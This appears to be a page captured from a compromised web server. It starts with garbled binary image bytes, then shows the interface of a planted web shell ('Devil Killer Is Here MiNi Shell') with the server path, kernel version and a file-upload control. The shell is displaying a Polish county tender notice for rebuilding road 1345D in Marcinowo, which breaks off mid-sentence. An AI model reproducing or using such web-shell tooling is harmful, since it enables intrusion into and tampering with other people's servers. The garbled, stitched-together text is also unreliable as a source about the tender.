JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044486601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 1345 D Marcinowo. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Trzebnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932712041</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łączna 1c</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzebnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 3870617</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">drogi@powiat.trzebnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.drogi.trzebnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 1345 D Marcinowo. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f03030ca-2545-4aa4-b1a2-9cae20d135be</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00444866</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00058631/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.15 Przebudowa drogi powiatowej nr 1345D Marcinowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/drogi_trzebnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/drogi_trzebnica</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Osobą uprawnioną do kontaktu z Wykonawcami jest:<br/>Maciej Kocuła, tel. 71 387 06 17,<br/>e-mail: m.kocula@powiat.trzebnica.pl<br/>2. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/drogi_trzebnica.<br/>3. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>4. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/>elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym.<br/>W procesie składania oferty, wniosku w<br/>tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest pracownik Zarządu Dróg Powiatowych w Trzebnicy;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>drogi@powiat.trzebnica.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego, a w przypadku zawarcia umowy również na podstawie art. 6 ust. 1 lit. b RODO w celu wykonania umowy zawartej w wyniku wyboru w postępowaniu oferty jako najkorzystniejszej.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. 7) w<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.8) posiada Pani/Pan:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdy podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DTiZP/200/21/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przebudowa drogi powiatowej nr 1345 D Marcinowo.<br/>2.	Przedsięwzięcie obejmuje:<br/>2.1 Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest przebudowa drogi powiatowej nr 1345D na odcinku o długości ok. 710 m. w miejscowości Marcinowo.<br/>2.2 Stan istniejący.<br/>Obszar objęty opracowaniem zaczyna się przy wjeździe do miejscowości Marcinowo na wysokości z ul. Morelową i Owocową, a kończy na końcu miejscowości w miejscu połączenia z istniejącą nawierzchnią będącą w dobrym stanie technicznym. Łączna długość odcinka wynosi około 710 m. W stanie istniejącym szerokość jezdni zarówno po stronie lewej jak i prawej znajdują się liczne zjazdy. Istniejąca nawierzchnia bitumiczna znajduje się w złym stanie technicznym i wymaga pilnej naprawy<br/><br/>2.3 Kategoria geotechniczna podłoża.<br/>Na przebudowywaną drogę powiatową działają proste, niezłożone obciążenia, przewidywane konstrukcje nie są skomplikowane, warunki gruntowe oraz warunki wodne są proste, konsekwencje zniszczenia projektowanych obiektów są znikome w związku z powyższym założono pierwszą kategorie geotechniczną<br/><br/>2.4 Opis przyjętych rozwiązań projektowych.<br/> Podstawowe parametry techniczne:<br/>parametry	Droga powiatowa<br/>kat. ruchu drogi	KR 2<br/>klasa drogi	Z<br/>długość ulicy	Odcinek – 710 m<br/>szerokość jezdni	5,50 – 6,50 m<br/>Szerokość poboczy z kruszywa	1,0 m<br/><br/>Celem przebudowy drogi powiatowej jest wykonanie nowej nawierzchni bitumicznej ze względu na zły stan nawierzchni istniejącej. Planowane jest wykonanie jezdni o szerokości od 5,5 m do 6,5 m oraz przebudowa istniejących zjazdów. W ramach przebudowy drogi powiatowej zostaną też udrożnione i wyregulowane wysokościowo istniejące wpusty drogowe celem sprawnego odpływu wody oraz mechanicznie wyczyszczona istniejąca kanalizacja wraz z przykanalikami. Odtworzenie obustronnych poboczy przyczyni się do usprawnienia spływu wód opadowych z jedni drogi powiatowej. W celu poprawy systemu odwodnienia przebudowywanej drogi powiatowej istniejące rowy zostaną oczyszczone i udrożnione. Dodatkowo na ostatnim odcinku drogi około 215 m zostanie wykonana mechaniczna ścinka poboczy w celu powierzchniowego odprowadzenia wody opadowej na stronę cieku wodnego.<br/>W ramach inwestycji zostanie też odtworzona zatoka autobusowa w miejscu istniejącej wraz z peronem dla wsiadających, natomiast w rejonie remizy strażackiej w km ok. 0+182 zostanie wykonany próg zwalniający, będący jednocześnie przejściem dla pieszych (miejsce obecnego przejścia dla pieszych). Istniejący chodnik znajdujący się po lewej stronie jezdni w km ok. 0+180 – 0+256 zostanie przełożony wraz z krawężnikiem i dostosowany do nowych wysokości jezdni. Na odcinku od km 0+613 do km 0+672 po lewej stronie przekroją za poboczem przewidziano umocnienie skarp betonowymi płytami ażurowymi wypełnionymi kruszywem. <br/>W km od 0+80 do km 0+120 po prawej stronie jezdni za poboczem znajdują się trzy karpiny pozostałe po wycince drzew, które w ramach przedmiotowego zadania należy usunąć.<br/>2.4.1 Dane informujące czy działka lub teren, na którym projektowany jest obiekt budowlany, są wpisane do rejestru zabytków oraz czy podlegają ochronie na podstawie ustaleń miejscowego planu zagospodarowania przestrzennego.<br/>Teren planowanej inwestycji nie posiada miejscowego planu zagospodarowania terenu<br/>2.4.2 Dane określające wpływ eksploatacji górniczej na teren zamierzenia budowlanego znajdującego się w granicach terenu górniczego.<br/>Zakres przedmiotowej inwestycji jest na tyle mały, że nie ma on wpływu na eksploatację górniczą w rejonie powyższej przebudowy.<br/>2.4.3 Obszar oddziaływania inwestycji mieści się w całości w granicach pasa drogowego.<br/>a) określenie obszaru oddziaływania obiektu dokonano w oparciu o:<br/>- Ustawa z dnia 7 lipca 1994r.- Prawo Budowlanego (tekst jednolity: Dz. U. 2016 poz. 290 z późn, zmianami) – art. 5 ust. 1<br/>b) przebudowywana droga powiatowa ma obszar oddziaływania zamykający się w istniejących granicach pasa drogowego lub działkach przeznaczonym pod drogę.<br/><br/>2.5 Przekroje konstrukcyjne.<br/>Zaprojektowano następującą konstrukcję:<br/>- nakładka bitumiczna (po sfrezowaniu warstwy bitumicznej znajdującej się na kostce granitowej)<br/>•	Warstwa ścieralna z betonu asf. AC11S 50/70 gr. 4 cm<br/>•	Warstwa wyrównawcza AC11W 50/70 75kg/m2<br/>- pełna konstrukcja (poszerzenie + zatoka autobusowa)<br/>•	Warstwa ścieralna z betonu asf. AC11S gr. 4 cm<br/>•	Warstwa wiążąca z betonu asf. AC16W 50-70 gr. 6 cm<br/>•	Podbudowa z kruszywa 0-31,5 mm gr. 10 cm<br/>•	Podbudowa z kruszywa 0/63 mm gr. 15 cm<br/>•	Warstwa odsączająca gr. 10 cm<br/>- zjazdy bitumiczne <br/>•	Warstwa ścieralna z betonu asf. AC11S gr. 5 cm<br/>•	Podbudowa z kruszywa 0/31,5 mm gr. 20 cm<br/>- chodnik przy przystanku<br/>•	Warstwa ścieralna z kostki betonowej gr. 8 cm<br/>•	Podsypka cementowo-piaskowa 1:4 gr. 3 cm<br/>•	Podbudowa z kruszywa 0/31,5 mm gr. 15 cm<br/><br/>2.6 Sposób wykonywania robót.<br/>W celu realizacji zadania należy wykonać następujący zakres robót w istniejącym pasie drogowym:<br/>- wykonanie nawierzchni bitumicznej o szerokości 5,5 m – 6,5 m. Długość drogi ok. 710 m zgodnie z planem sytuacyjnym.<br/>Kategoria ruchu drogowego: KR 2, szerokość projektowanej poszerzonej nawierzchni bitumicznej wynosi 5,5 m:<br/>•	opracowanie, zatwierdzenie i wprowadzenie tymczasowej organizacji ruchu na czas robot,<br/>•	roboty pomiarowe przy liniowych robotach ziemnych- trasa drogi w terenie równinnym,<br/>•	ręczne wykoszenie porostów ze skarp rowu,<br/>•	karczowanie istniejących pni drzew,<br/>•	roboty rozbiórkowe - frezowanie nawierzchni bitumicznej o śr. grubości 3 cm z wywozem materiału z rozbiórki na odległość 1 km (do istniejącej kostki granitowej), <br/>•	mechaniczne wykonanie koryta pod nową konstrukcję drogi głównej i zjazdów z transportem urobku samochodami samowyładowczymi na odległość 1 km, <br/>•	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni (droga główna, zjazdy), <br/>•	oczyszczenie i udrożnienie istniejących kanalizacji deszczowej wraz z przy kanalikami, <br/>•	regulacja wysokościowa istniejących wpustów, <br/>•	regulacja wysokościowa istniejących zasuw wodociągowych, <br/>•	warstwa odsączająca grubości 10 cm - droga główna poszerzenie, zatoka autobusowa, <br/>•	podbudowa z kruszywa łamanego frakcji 0/63 mm - warstwa górna o grubości po zagęszczeniu 15 cm - droga główna poszerzenie, zatoka autobusowa, <br/>•	podbudowa z kruszywa łamanego frakcji 0/31,5 mm - warstwa górna o grubości po zagęszczeniu 10 cm - droga główna poszerzenie, zatoka autobusowa i zjazdy, <br/>•	skropienie podbudowy emulsją asfaltową w ilości 0,50 kg/m2 - podbudowa na drodze głównej poszerzenie i zjazdach, zatoka autobusowa, <br/>•	wykonanie warstwy wyrównawczej AC11W - 75kg/m2 - droga główna, <br/>•	ułożenie geosiatki dla ruchu KR 2 50/50 kN/m z włókien szklanych wstępnie powleczonych asfaltem, <br/>•	nawierzchnia z mieszanek mineralno-asfaltowych AC16W (warstwa wiążąca) - grubość po zagęszczeniu 6 cm - poszerzenie droga główna + zatoka autobusowa), <br/>•	skropienie i oczyszczenie warstwy wiążącej emulsją asfaltową w ilości 0,50 kg/m2 - na drodze głównej, zatoka autobusowa, <br/>•	nawierzchnia z mieszanek mineralno-asfaltowych AC11S 50/70 (warstwa ścieralna) - grubość po zagęszczeniu 4 cm - droga główna, poszerzenia, zatoka autobusowa <br/>•	nawierzchnia z mieszanek mineralno-asfaltowych AC11S 50/70 (warstwa ścieralna) - grubość po zagęszczeniu 5 cm - zjazdy, <br/>•	mechaniczne ścinanie poboczy po dwóch stronach jezdni o grubości 10 cm, <br/>•	uzupełnienie poboczy po dwóch stronach jezdni kruszywem 0/31,5 mm o grubości po zagęszczeniu 15 cm, stabilizowanego mechanicznie. Szerokość 1,00 m i nadanym spadkiem poprzecznym do 6 % od jezdni, <br/>•	lokalne ścinanie i karczowanie krzewów wraz z zrębakowaniem, <br/>•	oczyszczenie rowów po prawej i lewej stronie jezdni na całym odcinku przebudowywanej drogi powiatowej z namułu o grubości 20 cm z wyprofilowaniem skarp rowu, wraz z oczyszczeniem i odmuleniem istniejących przepustów znajdujących się pod korona drogi,<br/>•	wykonanie geodezyjnej mapy powykonawczej.<br/>2.7 Odwodnienie. <br/>Odwodnienie dla przebudowywanej drogi powiatowej będzie odbywało się za pomocą spadków podłużnych i poprzecznych do istniejących rowów oraz istniejących wpustów drogowych znajdujących się w pasie drogowym.<br/>2.8 Roboty ziemne.<br/>Roboty ziemne sprowadzają się do mechanicznego i ręcznego korytowania oraz profilowania dna koryta pod konstrukcję ulicy, budowę zjazdów, poboczy zgodnie z planem sytuacyjnym projektowanego układu komunikacyjnego. Roboty ziemne w bezpośredniej bliskości istniejącego uzbrojenia uwidocznionego na planie sytuacyjnym należy wykonywać ręcznie, z zachowaniem szczególnej ostrożności i pod nadzorem pracownika – użytkownika sieci.<br/><br/>Zabezpieczenie miejsc niebezpiecznych:<br/>- wykonanie i ustawienie odpowiednich barier czy osłon:<br/><br/>Obsługa sprzętu, urządzeń, narzędzi:<br/> – przestrzeganie wykonywania prac sprzętem i narzędziami zgodnie z ich przeznaczeniem i zgodnie z instrukcją obsługi.<br/>Materiały:<br/> – stosowanie materiałów budowlanych posiadających aprobaty techniczne ITB, znak bezpieczeństwa i wymagane atesty.<br/><br/>Roboty ziemne:<br/> – odpowiednio zabezpieczenie wykopy.<br/><br/>Układanie warstw podbudowy i nawierzchni:<br/>– zabezpieczenie teren oraz zachowanie ostrożności podczas pracy z użyciem sprzętu ciężkiego.<br/><br/>W przypadku stwierdzenia rozbieżności pomiędzy usytuowaniem w planie oraz rzędnych wysokościowych elementów projektowanych w stosunku do stanu istniejącego określonego wg pomiaru oraz mapy zasadniczej, należy niezwłocznie powiadomić Inwestora w celu umożliwienia ewentualnej korekty rozwiązań projektowych.<br/><br/>Roboty należy wykonać zgodnie z obowiązującymi normami, specyfikacjami technicznymi,<br/>zasadami bhp i zgodnie ze sztuką budowlaną. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy 